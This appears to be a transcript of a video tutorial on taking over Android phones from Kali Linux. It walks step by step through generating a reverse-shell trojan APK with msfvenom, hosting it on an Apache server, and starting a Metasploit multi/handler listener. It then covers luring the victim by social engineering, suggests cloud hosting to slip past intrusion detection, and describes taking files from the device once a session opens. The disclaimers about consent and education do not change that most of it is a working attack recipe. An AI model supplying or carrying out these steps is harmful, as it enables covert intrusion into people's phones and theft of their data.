Hello defenders, welcome back to where we hack, learn and protect. And on this video we're going into Android hacking. Basically it's getting into an Android operating system remotely using Kali Linux, and we will utilize MSF Venom in order to make and set aside a payload that is in APK file, and in the execution of generating the payload we have to frame up a listener on Metasploit framework. Then we'll have to manipulate a victim in order to download the payload that we created earlier. And usually social engineering is the psychological manipulation of people into performing actions they didn't intend to perform. Now, once the application has been installed onto an Android device, we as attacker can easily get back a Metapredator session on Metasploit, and you can likewise hack an Android gadget through the internet or by utilizing your public or external IP address in the lhost, and also by the concept of port forwarding. Note that these techniques are just for testing purposes on your own Wi-Fi or with consent of the proprietor. Try not to utilize these techniques on systems you're not allowed to test or anyone. So first, we move into generating the payload. That is, we'll type in ifconfig into a terminal in order to view our network interface configuration that we're going to use to execute this attack. First, as we said, we're typing in ifconfig and right here we see we have 80. This is the first Ethernet interface, and it consists of an INET which shows an internet protocol address of our attack machine. Well, in our case over here, we'll be using LAN 0. This is the wireless network interface, and the INET here showing our IP address that we're going to be using to perform this attack. And this yellow here, this is the loopback interface. So after getting your interface IP address, we will use MSF Venom that will produce a payload to infiltrate the Android OS. Next, what you're going to do is list all the accessible choices with MSF Venom. This is, we will show or we will list down all the boundaries that will assist us with producing our payload. To do that, we'll go ahead and type in clear on this. Type in MSF Venom Shedge, and on that end, right here we have all the boundaries that we can use. And now the payload can be saved in exe, msi, apk, etc. But for this tutorial, we will use APK format, as the victim's device would be an Android device which supports APK extensions. So now we have to create the payload which we may execute on the victim's device, that is our Android device here that we're going to be performing the tests on. So right away we go into clearing our screen and type in MSF Venom and then -p for the payload, and then Android/Metapredator /inverse_TCP, and then the lhost. This is our IP address that is in the INET of our interface right now, and the lport that we're going to be using, and the var/www/html/ and the name of the APK, what you're actually going to be calling it. And now what you're going to be doing is that, notice that here this -p shows us the payload type that you're creating, and this over here slash Android slash Meterpreter slash reverse underscore TCP indicates a reverse Meterpreter shell would roll in from an objective Android device, and this lhost over here, this shows our IP. This is the attacker's IP address. The L port, this is the port that we're going to be listening on our attacker machine, and these are over here var/www/html, and then the name of the APK that we're generating, androidhack.apk, is going to be generated and stored directly onto our Apache server. And the .apk, this is the file extension of the Trojan we are creating, and this would set aside some effort or time to produce an APK document of around 10,186 bytes. So what we do, we hit enter on it, and it says permission denied. So what we do next, we'll run it with the sudo command. Let's see what happened. Hit enter on it. The permission denied. Okay, so let's sudo see right there. So let's copy this and paste it in here. So it's actually creating the APK file extension right now. So now, and first, and then in setting up the attack now, firstly, we need to check the status of our Apache server. This is our web application server, and to do so, we need a few commands inside to be run inside our terminal. And right here, as you can see, we already have created our payload. That is the payload, and the payload size is 10,244 bytes, and that's how we created our Trojan application. And node platform has been selected, MSF module platform Android from the payload. So to actually view this, it is in here. So let's try and move into the directory and see it. Controls V and then ls, and right here we have our Trojan application created. And next, what we need to do is start up Apache server and convince our target device over here to download it. So first, we need to check the status of our Apache server, our web application server, and to do so, we do let's clear on this, and we do the service Apache 2 status. So here we see it's been disabled and inactive. So what we do now, we have to start it up. So start. So and then let's check the status once more. Right now we see it's actively running and it is processing requests. So we can use this Apache 2 web server to post files, or we can put on Google Drive or Dropbox or any cloud providers who have shared files, and then we can put those files on the server, and the victims will not be able to detect any malicious intent because the network intrusion detection system may bypass and say, hey, this is a friendly domain, we'll let it go. And so right here we have it running, and what we need to do right now is set up and start our MSF console where we're going to be listening from once it has been downloaded onto the attacker's device, onto the victim's device. So what we do right now is, so let's end on this. So clear this up, and now let's have MSF console. Hit enter on that. So here we go. We already have MSF console running, and now we are going to use multi-handler exploit to set the payload, and the same as generated previously. This will help us to generate a listener. So what we do now, we'll use multi-handler. You should enter on that. Such results from, well, as it says, so I see here. So this multi, I think, yeah, use multi/handler. We should enter on it, and there we go. And now we're going to set our payload, the same payload that we set up during creating the Trojan APK file. So we'll do set payload Android/meterpreter /reverse _ TCP. Then hit enter on that, and that there we go. We already have our payload set. Now we will use the show options command in order to see the configuration set to the L host, that is the local host, and the L port, the local port that we're going to be listening on, and the values that we're going to be using here are the same that we used during creating the payload. So what we do next is show options, and on that. And right here we have the L port set to 4444, the same exact port number that we used. And the L host, now this is where our IP goes in, our attacker IP goes in. So what we do now, we're going to do set L host to 192.168. Our same IP address, 192.168.1.70. Maybe it's been confirmed still, so it's .1.70. Okay, yes, so that's how it is. Now let's check on the options again. And right here we have our L host and the L port set correctly. So now what we do, we can type in exploit to launch the desired attack. So this is now going to start the TCP handler starts immediately after this exploit. So this exploit command, so right here we see we have started reverse TCP handler on 192.168.1.70. And in real life scenarios, some social engineering procedures can be utilized to let the objective download the vindictive APK file. And for the tutorial purpose, we are simply making the victim machine download the file in the Android phone. So we'll hop into a mobile device and try and see if downloading this application is actually going to show you how Android devices get hacked. And what you're going to be doing now, your onto your attacker device now, or the link that you want to send your victim to down, that will lead them to the download file of your server that you're currently hosting and it's online, is you're going to be using this IP address over here slash the name of the file that we named it, that was Android hack. And after downloading the payload successfully, notice that we will get a reversal right here, because we are currently listening on this port to see if anyone clicks on our application that we controlled, that we created. And up until now, this alternative has been seen regularly when we attempt to introduce some outsider application, and ordinary clients won't know how to escape this. And let me show you how this happens. So on your mobile device, going to power on the mobile device right here, I'm going to be showing you on the screen. So right here onto our mobile device, I'm going to be launching this. So let me show you. We'll do ADB devices. Right there. So right here we have our device connected, our Android device connected, and so I'll do ADB devices once more. Yeah, and now it's moved from unauthorized to device, meaning we have successfully authorized to screen copy our device here, so that I can show you what happens. So next to do the screen copy. and let's see, here it is. And now, since we have our device already here, now move into your browser, and right here we already have, we are viewing our Apache server from our Android device. What we do next here is we'll copy this and use it right over here and slash the name of the APK that we created, that is the Android arc.apk, and hit enter on it. And it says here file can't be downloaded securely, but in most Android devices this is not actually available. So let's press on keep, and see here we have downloaded our file and click open. So let's allow it to install the file, and let's click on install. So once the application has been downloaded onto your target device, when the user or your victim clicks on it, it's actually going to start a version right over here. As you see, here is saying started reverse TCP handler on this port, and once we actually access this exact IP and port on our web browser from the mobile device, we got this sending the stage bytes into, so it's trying to start the shell from the browser, but that is not possible unless it is installed on the mobile device. So once your victim clicks on it, gives you way in, and the post exploitation process starts, and that's you check the background sessions and then list down all the sessions from the IPs connected to the machine. So an attacker gets to maneuver from different devices using the same application on the same multi-handler in his Metasploit framework, and you can interact with any session by typing you only have to specify the session that you need. So that's the session. You use session-i and then the session ID, which will be displayed once the device is connected. So after entering a session, you can go ahead and type in help, so that you see so that you can list down all the commands that you can put forward into that specific session, and you can see some file system commands that are useful when you are attempting to pursue some touchy data or information. So by utilizing these, you can undoubtedly download or transfer any document or data from your victim's mobile device onto your own Kali Linux machine. And notice that anything that happens inside that mobile device, you have full control over it, because you can see all applications being used in that device, and that is scary actually, because no one wants their data exposed. So some of these new Android devices have come up with a way to mitigate on this type of attack by simply having app protection, and you also have the Google Play Protect, which might be very uneasy for your Trojan application to be installed into the device, and simply because these new models block such applications that are very malicious. So that is it, and remember, this is only for educational purposes, and this tutorial can be successfully implemented in the case of an Android 8 or a lesser version. And this is this tutorial, I've actually made it to give the community a basic idea of how hackers get into our personal gadgets, and the above method is the most basic one. And firstly, by creating an Android payload, by creating an Android payload, by creating an Android payload by MSF Venom and then exploiting it using the Metasploit framework, and as it is delivered using various social engineering techniques onto your victim's phone. Remember, we hack, learn, and protect.